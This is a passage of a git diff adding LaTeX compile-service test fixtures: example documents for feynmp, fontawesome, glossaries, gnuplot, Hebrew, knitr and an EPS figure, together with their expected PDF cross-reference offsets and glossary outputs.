+\fmflabel{$p_1$}{o2} +\fmf{quark}{i1,v1} +\fmf{quark}{i2,v1} +\fmfblob{.35w}{v1} +\fmf{quark}{v1,o1} +\fmf{quark}{v1,o2} +\end{fmfgraph*} +\end{center} + +\end{fmffile} + +\end{document} \ No newline at end of file diff --git a/services/clsi/test/acceptance/fixtures/examples/feynmf/output.pdf b/services/clsi/test/acceptance/fixtures/examples/feynmf/output.pdf new file mode 100644 index 0000000..60b36ad Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/feynmf/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/feynmf/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/feynmf/output.pdfxref new file mode 100644 index 0000000..2aa923d --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/feynmf/output.pdfxref @@ -0,0 +1,28 @@ +1/0: uncompressed; offset = 27064 +2/0: uncompressed; offset = 27312 +3/0: uncompressed; offset = 15 +4/0: uncompressed; offset = 216 +5/0: uncompressed; offset = 713 +6/0: uncompressed; offset = 763 +7/0: uncompressed; offset = 892 +8/0: uncompressed; offset = 1007 +9/0: uncompressed; offset = 1235 +10/0: uncompressed; offset = 4832 +11/0: uncompressed; offset = 12199 +12/0: uncompressed; offset = 19196 +13/0: uncompressed; offset = 26341 +14/0: compressed; stream = 13, index = 0 +15/0: compressed; stream = 13, index = 1 +16/0: compressed; stream = 13, index = 2 +17/0: compressed; stream = 13, index = 3 +18/0: compressed; stream = 13, index = 4 +19/0: compressed; stream = 13, index = 5 +20/0: compressed; stream = 13, index = 6 +21/0: compressed; stream = 13, index = 7 +22/0: compressed; stream = 13, index = 8 +23/0: compressed; stream = 13, index = 9 +24/0: compressed; stream = 13, index = 10 +25/0: compressed; stream = 13, index = 11 +26/0: compressed; stream = 13, index = 12 +27/0: compressed; stream = 13, index = 13 +28/0: compressed; stream = 13, index = 14 diff --git a/services/clsi/test/acceptance/fixtures/examples/feynmp/main.tex b/services/clsi/test/acceptance/fixtures/examples/feynmp/main.tex new file mode 100644 index 0000000..6027bf9 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/feynmp/main.tex @@ -0,0 +1,28 @@ +\documentclass[a4paper]{article} +\usepackage{feynmp} + +\begin{document} + +\setlength{\unitlength}{1mm} + +\begin{fmffile}{diagram} + +\begin{center} +\begin{fmfgraph*}(41,17) +\fmfleftn{i}{2} +\fmfrightn{o}{2} +\fmflabel{$g_2$}{i1} +\fmflabel{$g_1$}{i2} +\fmflabel{$p_2$}{o1} +\fmflabel{$p_1$}{o2} +\fmf{quark}{i1,v1} +\fmf{quark}{i2,v1} +\fmfblob{.35w}{v1} +\fmf{quark}{v1,o1} +\fmf{quark}{v1,o2} +\end{fmfgraph*} +\end{center} + +\end{fmffile} + +\end{document} \ No newline at end of file diff --git a/services/clsi/test/acceptance/fixtures/examples/feynmp/options.json b/services/clsi/test/acceptance/fixtures/examples/feynmp/options.json new file mode 100644 index 0000000..a280541 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/feynmp/options.json @@ -0,0 +1,3 @@ +{ + "compiler": "latex" +} diff --git a/services/clsi/test/acceptance/fixtures/examples/feynmp/output.pdf b/services/clsi/test/acceptance/fixtures/examples/feynmp/output.pdf new file mode 100644 index 0000000..03c76e9 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/feynmp/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/feynmp/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/feynmp/output.pdfxref new file mode 100644 index 0000000..c4ef625 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/feynmp/output.pdfxref @@ -0,0 +1,20 @@ +1/0: uncompressed; offset = 4964 +2/0: uncompressed; offset = 5023 +3/0: uncompressed; offset = 5234 +4/0: uncompressed; offset = 15 +5/0: uncompressed; offset = 734 +6/0: uncompressed; offset = 799 +7/0: uncompressed; offset = 933 +8/0: uncompressed; offset = 1104 +9/0: uncompressed; offset = 1947 +10/0: uncompressed; offset = 1992 +11/0: uncompressed; offset = 2182 +12/0: uncompressed; offset = 2427 +13/0: uncompressed; offset = 2597 +14/0: uncompressed; offset = 2822 +15/0: uncompressed; offset = 2989 +16/0: uncompressed; offset = 3239 +17/0: uncompressed; offset = 3271 +18/0: uncompressed; offset = 3328 +19/0: uncompressed; offset = 3740 +20/0: uncompressed; offset = 4270 diff --git a/services/clsi/test/acceptance/fixtures/examples/fontawesome/main.tex b/services/clsi/test/acceptance/fixtures/examples/fontawesome/main.tex new file mode 100644 index 0000000..42bfa8e --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/fontawesome/main.tex @@ -0,0 +1,12 @@ +\documentclass{article} +\usepackage{fontawesome} + +\begin{document} +Cloud \faCloud + +Cog \faCog + +Database \faDatabase + +Leaf \faLeaf +\end{document} diff --git a/services/clsi/test/acceptance/fixtures/examples/fontawesome/output.pdf b/services/clsi/test/acceptance/fixtures/examples/fontawesome/output.pdf new file mode 100644 index 0000000..da0df0a Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/fontawesome/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/fontawesome/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/fontawesome/output.pdfxref new file mode 100644 index 0000000..96eb1a0 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/fontawesome/output.pdfxref @@ -0,0 +1,23 @@ +1/0: uncompressed; offset = 31058 +2/0: uncompressed; offset = 31307 +3/0: uncompressed; offset = 15 +4/0: uncompressed; offset = 216 +5/0: uncompressed; offset = 678 +6/0: uncompressed; offset = 728 +7/0: uncompressed; offset = 855 +8/0: uncompressed; offset = 970 +9/0: uncompressed; offset = 1203 +10/0: uncompressed; offset = 18852 +11/0: uncompressed; offset = 30165 +12/0: compressed; stream = 11, index = 0 +13/0: compressed; stream = 11, index = 1 +14/0: compressed; stream = 11, index = 2 +15/0: compressed; stream = 11, index = 3 +16/0: compressed; stream = 11, index = 4 +17/0: compressed; stream = 11, index = 5 +18/0: compressed; stream = 11, index = 6 +19/0: compressed; stream = 11, index = 7 +20/0: compressed; stream = 11, index = 8 +21/0: compressed; stream = 11, index = 9 +22/0: compressed; stream = 11, index = 10 +23/0: compressed; stream = 11, index = 11 diff --git a/services/clsi/test/acceptance/fixtures/examples/fontawesome_xelatex/main.tex b/services/clsi/test/acceptance/fixtures/examples/fontawesome_xelatex/main.tex new file mode 100644 index 0000000..5158b67 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/fontawesome_xelatex/main.tex @@ -0,0 +1,16 @@ +\documentclass{article} +\usepackage{fontspec} +\defaultfontfeatures{Extension = .otf} % this is needed because + % fontawesome package loads by + % font name only +\usepackage{fontawesome} + +\begin{document} +Cloud \faCloud + +Cog \faCog + +Database \faDatabase + +Leaf \faLeaf +\end{document} diff --git a/services/clsi/test/acceptance/fixtures/examples/fontawesome_xelatex/options.json b/services/clsi/test/acceptance/fixtures/examples/fontawesome_xelatex/options.json new file mode 100644 index 0000000..a2e0c09 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/fontawesome_xelatex/options.json @@ -0,0 +1,3 @@ +{ + "compiler": "xelatex" +} diff --git a/services/clsi/test/acceptance/fixtures/examples/fontawesome_xelatex/output.pdf b/services/clsi/test/acceptance/fixtures/examples/fontawesome_xelatex/output.pdf new file mode 100644 index 0000000..e329b97 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/fontawesome_xelatex/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/fontawesome_xelatex/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/fontawesome_xelatex/output.pdfxref new file mode 100644 index 0000000..d5c979d --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/fontawesome_xelatex/output.pdfxref @@ -0,0 +1,26 @@ +1/0: uncompressed; offset = 6344 +2/0: uncompressed; offset = 15 +3/0: uncompressed; offset = 216 +4/0: uncompressed; offset = 707 +5/0: uncompressed; offset = 757 +6/0: uncompressed; offset = 887 +7/0: uncompressed; offset = 990 +8/0: uncompressed; offset = 1257 +9/0: uncompressed; offset = 1679 +10/0: uncompressed; offset = 2052 +11/0: uncompressed; offset = 4249 +12/0: uncompressed; offset = 4343 +13/0: uncompressed; offset = 5387 +14/0: uncompressed; offset = 5481 +15/0: uncompressed; offset = 5519 +16/0: compressed; stream = 15, index = 0 +17/0: compressed; stream = 15, index = 1 +18/0: compressed; stream = 15, index = 2 +19/0: compressed; stream = 15, index = 3 +20/0: compressed; stream = 15, index = 4 +21/0: compressed; stream = 15, index = 5 +22/0: compressed; stream = 15, index = 6 +23/0: compressed; stream = 15, index = 7 +24/0: compressed; stream = 15, index = 8 +25/0: compressed; stream = 15, index = 9 +26/0: compressed; stream = 15, index = 10 diff --git a/services/clsi/test/acceptance/fixtures/examples/glossaries/main.tex b/services/clsi/test/acceptance/fixtures/examples/glossaries/main.tex new file mode 100644 index 0000000..336f708 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/glossaries/main.tex @@ -0,0 +1,17 @@ +\documentclass{article} + +\usepackage{glossaries} +\makeglossaries + +\newglossaryentry{Physics}{ + name=Physics, + description={is the study of stuff} +} + +\begin{document} + +To solve various problems in \Gls{Physics} it can useful to express any arbitrary piecewise-smooth function as a Fourier Series composed of multiple sine and cosine funcions. + +\printglossaries + +\end{document} diff --git a/services/clsi/test/acceptance/fixtures/examples/glossaries/output.glg b/services/clsi/test/acceptance/fixtures/examples/glossaries/output.glg new file mode 100644 index 0000000..6bae571 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/glossaries/output.glg @@ -0,0 +1,7 @@ +This is makeindex, version 2.15 [TeX Live 2011] (kpathsea + Thai support). +Scanning style file ./output.ist...........................done (27 attributes redefined, 0 ignored). +Scanning input file output.glo....done (1 entries accepted, 0 rejected). +Sorting entries...done (0 comparisons). +Generating output file output.gls....done (6 lines written, 0 warnings). +Output written in output.gls. +Transcript written in output.glg. diff --git a/services/clsi/test/acceptance/fixtures/examples/glossaries/output.glo b/services/clsi/test/acceptance/fixtures/examples/glossaries/output.glo new file mode 100644 index 0000000..0b6f71e --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/glossaries/output.glo @@ -0,0 +1 @@ +\glossaryentry{Physics?\glossaryentryfield{Physics}{\glsnamefont{Physics}}{is the study of stuff}{\relax }|setentrycounter[]{page}\glsnumberformat}{1} diff --git a/services/clsi/test/acceptance/fixtures/examples/glossaries/output.gls b/services/clsi/test/acceptance/fixtures/examples/glossaries/output.gls new file mode 100644 index 0000000..128261a --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/glossaries/output.gls @@ -0,0 +1,6 @@ +\glossarysection[\glossarytoctitle]{\glossarytitle}\glossarypreamble +\begin{theglossary}\glossaryheader +\glsgroupheading{P}\relax \glsresetentrylist % +\glossaryentryfield{Physics}{\glsnamefont{Physics}}{is the study of stuff}{\relax }{\glossaryentrynumbers{\relax + \setentrycounter[]{page}\glsnumberformat{1}}}% +\end{theglossary}\glossarypostamble diff --git a/services/clsi/test/acceptance/fixtures/examples/glossaries/output.ist b/services/clsi/test/acceptance/fixtures/examples/glossaries/output.ist new file mode 100644 index 0000000..1861f24 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/glossaries/output.ist @@ -0,0 +1,29 @@ +% makeindex style file created by the glossaries package +% for document 'output' on 2013-7-28 +actual '?' +encap '|' +level '!' +quote '"' +keyword "\\glossaryentry" +preamble "\\glossarysection[\\glossarytoctitle]{\\glossarytitle}\\glossarypreamble\n\\begin{theglossary}\\glossaryheader\n" +postamble "\%\n\\end{theglossary}\\glossarypostamble\n" +group_skip "\\glsgroupskip\n" +item_0 "\%\n" +item_1 "\%\n" +item_2 "\%\n" +item_01 "\%\n" +item_x1 "\\relax \\glsresetentrylist\n" +item_12 "\%\n" +item_x2 "\\relax \\glsresetentrylist\n" +delim_0 "\{\\glossaryentrynumbers\{\\relax " +delim_1 "\{\\glossaryentrynumbers\{\\relax " +delim_2 "\{\\glossaryentrynumbers\{\\relax " +delim_t "\}\}" +delim_n "\\delimN " +delim_r "\\delimR " +headings_flag 1 +heading_prefix "\\glsgroupheading\{" +heading_suffix "\}\\relax \\glsresetentrylist " +symhead_positive "glssymbols" +numhead_positive "glsnumbers" +page_compositor "." diff --git a/services/clsi/test/acceptance/fixtures/examples/glossaries/output.pdf b/services/clsi/test/acceptance/fixtures/examples/glossaries/output.pdf new file mode 100644 index 0000000..23a0614 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/glossaries/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/glossaries/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/glossaries/output.pdfxref new file mode 100644 index 0000000..cbbbeb0 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/glossaries/output.pdfxref @@ -0,0 +1,23 @@ +1/0: uncompressed; offset = 34767 +2/0: uncompressed; offset = 35015 +3/0: uncompressed; offset = 15 +4/0: uncompressed; offset = 216 +5/0: uncompressed; offset = 678 +6/0: uncompressed; offset = 728 +7/0: uncompressed; offset = 856 +8/0: uncompressed; offset = 971 +9/0: uncompressed; offset = 1394 +10/0: uncompressed; offset = 10990 +11/0: uncompressed; offset = 19087 +12/0: uncompressed; offset = 33769 +13/0: compressed; stream = 12, index = 0 +14/0: compressed; stream = 12, index = 1 +15/0: compressed; stream = 12, index = 2 +16/0: compressed; stream = 12, index = 3 +17/0: compressed; stream = 12, index = 4 +18/0: compressed; stream = 12, index = 5 +19/0: compressed; stream = 12, index = 6 +20/0: compressed; stream = 12, index = 7 +21/0: compressed; stream = 12, index = 8 +22/0: compressed; stream = 12, index = 9 +23/0: compressed; stream = 12, index = 10 diff --git a/services/clsi/test/acceptance/fixtures/examples/gnuplot/main.tex b/services/clsi/test/acceptance/fixtures/examples/gnuplot/main.tex new file mode 100644 index 0000000..09077a5 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/gnuplot/main.tex @@ -0,0 +1,26 @@ +\documentclass{article} +\usepackage{pgfplots} +\usepackage{nopageno} + +\pgfplotsset{compat=newest} + +\begin{document} + +\begin{tikzpicture} + \begin{axis} + \addplot +[no markers, + raw gnuplot, + thick, + empty line = jump + ] gnuplot { + set contour base; + set cntrparam levels discrete 0.003; + unset surface; + set view map; + set isosamples 500; + splot x**3-3*x+3-y**2; + }; + \end{axis} +\end{tikzpicture} + +\end{document} \ No newline at end of file diff --git a/services/clsi/test/acceptance/fixtures/examples/gnuplot/output.pdf b/services/clsi/test/acceptance/fixtures/examples/gnuplot/output.pdf new file mode 100644 index 0000000..9e93e54 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/gnuplot/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/gnuplot/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/gnuplot/output.pdfxref new file mode 100644 index 0000000..f9dee6b --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/gnuplot/output.pdfxref @@ -0,0 +1,22 @@ +1/0: uncompressed; offset = 23295 +2/0: uncompressed; offset = 23543 +3/0: uncompressed; offset = 15 +4/0: uncompressed; offset = 216 +5/0: uncompressed; offset = 671 +6/0: uncompressed; offset = 721 +7/0: uncompressed; offset = 847 +8/0: uncompressed; offset = 955 +9/0: uncompressed; offset = 7385 +10/0: uncompressed; offset = 15752 +11/0: uncompressed; offset = 22721 +12/0: compressed; stream = 11, index = 0 +13/0: compressed; stream = 11, index = 1 +14/0: compressed; stream = 11, index = 2 +15/0: compressed; stream = 11, index = 3 +16/0: compressed; stream = 11, index = 4 +17/0: compressed; stream = 11, index = 5 +18/0: compressed; stream = 11, index = 6 +19/0: compressed; stream = 11, index = 7 +20/0: compressed; stream = 11, index = 8 +21/0: compressed; stream = 11, index = 9 +22/0: compressed; stream = 11, index = 10 diff --git a/services/clsi/test/acceptance/fixtures/examples/hebrew/main.tex b/services/clsi/test/acceptance/fixtures/examples/hebrew/main.tex new file mode 100644 index 0000000..0eb48d9 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/hebrew/main.tex @@ -0,0 +1,14 @@ +\documentclass{article} +\usepackage[utf8x]{inputenc} +\usepackage[hebrew,english]{babel} + +\begin{document} +\selectlanguage{hebrew} + + כדי לכתוב משהו באנגלית חייבים להשתמש במקרו הבא וכאן + + ממשיכים לכתוב בעברית. טקסט נוסחאות תמיד יהיה בכיוון שמאל-לימין + +\selectlanguage{english} +This is a test. +\end{document} diff --git a/services/clsi/test/acceptance/fixtures/examples/hebrew/output.pdf b/services/clsi/test/acceptance/fixtures/examples/hebrew/output.pdf new file mode 100644 index 0000000..b7f6883 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/hebrew/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/hebrew/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/hebrew/output.pdfxref new file mode 100644 index 0000000..4750e43 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/hebrew/output.pdfxref @@ -0,0 +1,20 @@ +1/0: uncompressed; offset = 24490 +2/0: uncompressed; offset = 24739 +3/0: uncompressed; offset = 15 +4/0: uncompressed; offset = 216 +5/0: uncompressed; offset = 657 +6/0: uncompressed; offset = 707 +7/0: uncompressed; offset = 833 +8/0: uncompressed; offset = 948 +9/0: uncompressed; offset = 1290 +10/0: uncompressed; offset = 13083 +11/0: uncompressed; offset = 23411 +12/0: compressed; stream = 11, index = 0 +13/0: compressed; stream = 11, index = 1 +14/0: compressed; stream = 11, index = 2 +15/0: compressed; stream = 11, index = 3 +16/0: compressed; stream = 11, index = 4 +17/0: compressed; stream = 11, index = 5 +18/0: compressed; stream = 11, index = 6 +19/0: compressed; stream = 11, index = 7 +20/0: compressed; stream = 11, index = 8 diff --git a/services/clsi/test/acceptance/fixtures/examples/knitr/main.Rtex b/services/clsi/test/acceptance/fixtures/examples/knitr/main.Rtex new file mode 100644 index 0000000..add779a --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/knitr/main.Rtex @@ -0,0 +1,13 @@ +\documentclass{article} +\begin{document} + +Hello world $x^2 = 0$. + +%% chunk options: cache this chunk +%% begin.rcode my-cache, cache=TRUE +% set.seed(123) +% x = runif(10) +% sd(x) # standard deviation +%% end.rcode + +\end{document} \ No newline at end of file diff --git a/services/clsi/test/acceptance/fixtures/examples/knitr/output.pdf b/services/clsi/test/acceptance/fixtures/examples/knitr/output.pdf new file mode 100644 index 0000000..67435f5 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/knitr/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/knitr/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/knitr/output.pdfxref new file mode 100644 index 0000000..3fe1986 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/knitr/output.pdfxref @@ -0,0 +1,31 @@ +1/0: uncompressed; offset = 43550 +2/0: uncompressed; offset = 43799 +3/0: uncompressed; offset = 15 +4/0: uncompressed; offset = 216 +5/0: uncompressed; offset = 734 +6/0: uncompressed; offset = 784 +7/0: uncompressed; offset = 913 +8/0: uncompressed; offset = 1021 +9/0: uncompressed; offset = 1546 +10/0: uncompressed; offset = 5794 +11/0: uncompressed; offset = 12915 +12/0: uncompressed; offset = 23660 +13/0: uncompressed; offset = 30657 +14/0: uncompressed; offset = 42604 +15/0: compressed; stream = 14, index = 0 +16/0: compressed; stream = 14, index = 1 +17/0: compressed; stream = 14, index = 2 +18/0: compressed; stream = 14, index = 3 +19/0: compressed; stream = 14, index = 4 +20/0: compressed; stream = 14, index = 5 +21/0: compressed; stream = 14, index = 6 +22/0: compressed; stream = 14, index = 7 +23/0: compressed; stream = 14, index = 8 +24/0: compressed; stream = 14, index = 9 +25/0: compressed; stream = 14, index = 10 +26/0: compressed; stream = 14, index = 11 +27/0: compressed; stream = 14, index = 12 +28/0: compressed; stream = 14, index = 13 +29/0: compressed; stream = 14, index = 14 +30/0: compressed; stream = 14, index = 15 +31/0: compressed; stream = 14, index = 16 diff --git a/services/clsi/test/acceptance/fixtures/examples/knitr_utf8/main.Rtex b/services/clsi/test/acceptance/fixtures/examples/knitr_utf8/main.Rtex new file mode 100644 index 0000000..29d575e --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/knitr_utf8/main.Rtex @@ -0,0 +1,35 @@ +\documentclass{article} +\usepackage[utf8]{inputenc} +\usepackage[spanish]{babel} + +\begin{document} + +\tableofcontents + +\vspace{2cm} %Add a 2cm space + +\begin{abstract} +Este es un breve resumen del contenido del +documento escrito en español. +\end{abstract} + +\section{Sección Introductoria} +Esta es la primera sección, podemos agregar +algunos elementos adicionales y todo será +escrito correctamente. Más aún, si una palabra +es demaciado larga y tiene que ser truncada, +babel tratará de truncarla correctamente +dependiendo del idioma. + +\section{Sección con teoremas} +Esta sección es para ver que pasa con los comandos +que definen texto + +%% chunk options: cache this chunk +%% begin.rcode my-cache, cache=TRUE +% set.seed(123) +% x = runif(10) +% sd(x) # standard deviation +%% end.rcode + +\end{document} diff --git a/services/clsi/test/acceptance/fixtures/examples/knitr_utf8/output.pdf b/services/clsi/test/acceptance/fixtures/examples/knitr_utf8/output.pdf new file mode 100644 index 0000000..1c236e6 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/knitr_utf8/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/knitr_utf8/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/knitr_utf8/output.pdfxref new file mode 100644 index 0000000..30918b7 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/knitr_utf8/output.pdfxref @@ -0,0 +1,39 @@ +1/0: uncompressed; offset = 75299 +2/0: uncompressed; offset = 75548 +3/0: uncompressed; offset = 15 +4/0: uncompressed; offset = 216 +5/0: uncompressed; offset = 790 +6/0: uncompressed; offset = 840 +7/0: uncompressed; offset = 975 +8/0: uncompressed; offset = 1083 +9/0: uncompressed; offset = 2128 +10/0: uncompressed; offset = 13799 +11/0: uncompressed; offset = 23682 +12/0: uncompressed; offset = 31867 +13/0: uncompressed; offset = 36116 +14/0: uncompressed; offset = 50352 +15/0: uncompressed; offset = 61569 +16/0: uncompressed; offset = 73516 +17/0: compressed; stream = 16, index = 0 +18/0: compressed; stream = 16, index = 1 +19/0: compressed; stream = 16, index = 2 +20/0: compressed; stream = 16, index = 3 +21/0: compressed; stream = 16, index = 4 +22/0: compressed; stream = 16, index = 5 +23/0: compressed; stream = 16, index = 6 +24/0: compressed; stream = 16, index = 7 +25/0: compressed; stream = 16, index = 8 +26/0: compressed; stream = 16, index = 9 +27/0: compressed; stream = 16, index = 10 +28/0: compressed; stream = 16, index = 11 +29/0: compressed; stream = 16, index = 12 +30/0: compressed; stream = 16, index = 13 +31/0: compressed; stream = 16, index = 14 +32/0: compressed; stream = 16, index = 15 +33/0: compressed; stream = 16, index = 16 +34/0: compressed; stream = 16, index = 17 +35/0: compressed; stream = 16, index = 18 +36/0: compressed; stream = 16, index = 19 +37/0: compressed; stream = 16, index = 20 +38/0: compressed; stream = 16, index = 21 +39/0: compressed; stream = 16, index = 22 diff --git a/services/clsi/test/acceptance/fixtures/examples/latex_compiler/image.eps b/services/clsi/test/acceptance/fixtures/examples/latex_compiler/image.eps new file mode 100644 index 0000000..fb131b9 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/latex_compiler/image.eps @@ -0,0 +1,6673 @@ +%!PS-Adobe-3.0 EPSF-1.2 +%%BoundingBox: 0 0 432 268 +%%HiResBoundingBox: 0 0 432 268 +%%Creator: (Wolfram Mathematica 8.0 for Linux x86 (64-bit) (February 23, 2011)) +%%CreationDate: (Monday, October 8, 2012)(15:03:46) +%%Title: Clipboard +%%DocumentNeededResources: font Times-Roman +%%DocumentSuppliedResources: font Times-Roman-MISO +%%+ font Mathematica2 +%%+ font Mathematica1 +%%DocumentNeededFonts: Times-Roman +%%DocumentSuppliedFonts: Times-Roman-MISO +%%+ Mathematica2 +%%+ Mathematica1 +%%DocumentFonts: Times-Roman +%%+ Times-Roman-MISO +%%+ Mathematica2 +%%+ Mathematica1 +%%EndComments +/p{gsave}bind def +/P{grestore}bind def +/g{setgray}bind def +/r{setrgbcolor}bind def +/k{setcmykcolor}bind def +/w{setlinewidth}bind def +/np{newpath}bind def +/m{moveto}bind def +/Mr{rmoveto}bind def +/Mx{currentpoint exch pop moveto}bind def +/My{currentpoint pop exch moveto}bind def +/X{0 rmoveto}bind def +/Y{0 exch rmoveto}bind def +/N{currentpoint 3 -1 roll show moveto}bind def +/L{lineto}bind def +/rL{rlineto}bind def +/C{curveto}bind def +/cp{closepath}bind def +/F{eofill}bind def +/f{fill}bind def +/s{stroke}bind def +/S{show}bind def +/tri{p 9 6 roll r 6 4 roll m 4 2 roll L L cp F P}bind def +/Msf{findfont exch scalefont[1 0 0 -1 0 0]makefont setfont}bind def +1 -1 scale 0 -267.698 translate +-35.28 -2.88 translate +[1 0 0 1 0 0 ] concat +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit + +%%MathematicaCell +%Cell[BoxData[ +% GraphicsBox[{{}, {}, +% {GrayLevel[0], LineBox[CompressedData[" +%1:eJw113dcTf8fB/B7697q7tW0KSoJWRnp/ba3rCR7kxmSzKy+KFlFvqSMjB++ +%ESqKrlVEKJoy2nvv3S/O+5x/7uPce8/n83m/nu+zeq7cOmeNBofDqeVyOH8+ +%2a0l/9EWydgK9V7d4EmZe47Cm8LwOycM2X1fGDzdYkfqz3L1024exbOfBoC3 +%r26ui2c5/R4EpUfSFFnDytWX/v2z/Q9yO+VvM84uo/8Hg9/5EpPBp8vUJbP/ +%fBMCXy8fN5GPKqPjn4DGhdnXo/JK1cKUG86jheEwxHn2wDHnSmm8Z7DcMeyV +%7+hStfni069rzZ7D73FreM8KSmj8KKiZGhB1z6dEHdRxdMqNl+C31zh+u20J +%zfcK1nC8d2oVFqsH/93egLor7NzkU0zzvwWPY/98uDG6WP2m1qxjhmhwtBjk +%dye/iNbzDkRHH6e5ny1Sz/k74XvY7J513WxUEa0vFhJ+vlgTkFOoztzzZ8AP +%YDckMqHAu5DWGwf9rDutaBhWqN72Z3nOn2DLwfSeGb8LaP2fobqXp8v54wVq +%RiMedJ1rPhpaFVA98XBvmqp6Y1q+evLfCRIgKtrukO+hfKovAa4/0ex0wDxf +%/We2xae/wuWhSVqYkEf1foM7E+x2fnPLU/8tJ+Ub9MHHQYN75FH9iZCe2ui9 +%4F2uuvuf5XRLghFBj47Yb8mlPJLAyiiZ11kvV71u7Z8tGcxC4sIeROZQPikQ +%nNGyS29ljvrPaLrBKXB/zgzOGJ0cyisVnGs38MYEZ6vr/gxXmwpxOW67tedl +%U35pMMcjofO/jVlq278DfoegKVuPNQVkUZ7f4RpHXT5wfJb67/I80mF2ZJu1 +%cWEm5fsDHKa6JZd5Z6o/xf3ZfoDBO+2sPYMyKe+fYGHW3z0pOUOt93eBv+DB +%/IdHm/ZkUP6/4Mi8AfcqumWo/w63+DfofvIPWuzxmzwy4HDdvBtr4n5RPRng +%XyQ/26D8RT4ZMPzRQcuhjj+pvgxocL11Ky/gB3llQtVuy7W2OelUbyYkKzUb +%upink18mhO8U4sXN36n+LKgLm1j3X0gaeWaB1zML89G1qZRHFmim+1ksHZ5K +%vtlgedzAUmNvCuWTDQ3HXh8c/iKZvLPBRX+wU01bEuWVA6+K352eiUnknwMT +%axKOmR9KpPxywHbtC6ejr75RP+RCoPeYCnfuN8ozF3oOWGKVjV+pP3LBe7L5 +%piz3BMo3Dxx73Vu6Niqe+iUPxjkazH/X8IXyzoM+e25rp+74TP2TD+LzNpol +%pXGUfz4kRp4W8dZ9pH7KhytWwuBOv2PJowD+O3xdbDv/PXkUQOigqX62cTHk +%UQAmpw6MmzEmmjwKID7AsmxD6BvyKAQn433ymWavyaMQ9Dj2C8ZeekkehfD2 +%tIXdFv0o8iiCLxaLbU3qItRn/noUgeSth6vXt3DyKAKT2d+7fgx+Qh7FUOYz +%5qzF8RDyKAazMPW0oKj75FEMtptcBlWtu0UeJTCxx4K8oZKr5FEChh625dcX +%+ZBHCdxdculc2bQ95FEK/jDse0aTGzAepXDat36zh6EPMB6lEOMyLXttSyAw +%HmXw0vl9VIrLLWA8yiDsQt/zKyvuA+NRBjv2/d43+GkIMB7lUHT/5ubmpifA +%eJTD2mtGW4vgKTAe5fB4Z5evQccigfGoAOVTaPVLiAKmngqY/6hX1yGyV8D4 +%VEBui2yWT9hrYOqrAGPprh6ey94C41UBT9Mc+z4XxABTbwVYR3y/ZB36Dhi/ +%Crh4w3aAYmUsMPVXgmNgbMYq+UdgPCvBzrn8foY6jvKohF1ulbIi58/A+FbC +%qfuxDgGKeMqnEmpM34d7FscD410J2DMwyigmgfKqgsnmb18fvPYVGP8qyP+i +%eXn3/m+UXxVk1g8+OnVhIjDnZxWU1nmvz7FOojyroIeBPsdSPxmY/qiCWTF9 +%JVibTPlWwzDfRG2DpBRg+qUaTjQei30Zmkp5V8O1LS5aQ/zSgOmfanAvvXnN +%fvd3yr8a7G59+7JjcTow/VQNMr7DyVn4gzxq4Oo/D/X5vX+SRw30CbVN8hT+ +%Io8aWFESNqam4hd51MCExLtuY1J/k0cN3LLSbRmxPIM8asBzeCet0MQM8qiB +%xasjHkZMySSPWoiyEMg7qTPJoxby2zPkrUOyyKMWLhklHVp0L4s8aiFlYNjQ +%vr2yyaMWTljpGO/5N5s8asG5x7V9qMghjzp4963x2KkTOeRRB5EuJi12Grnk 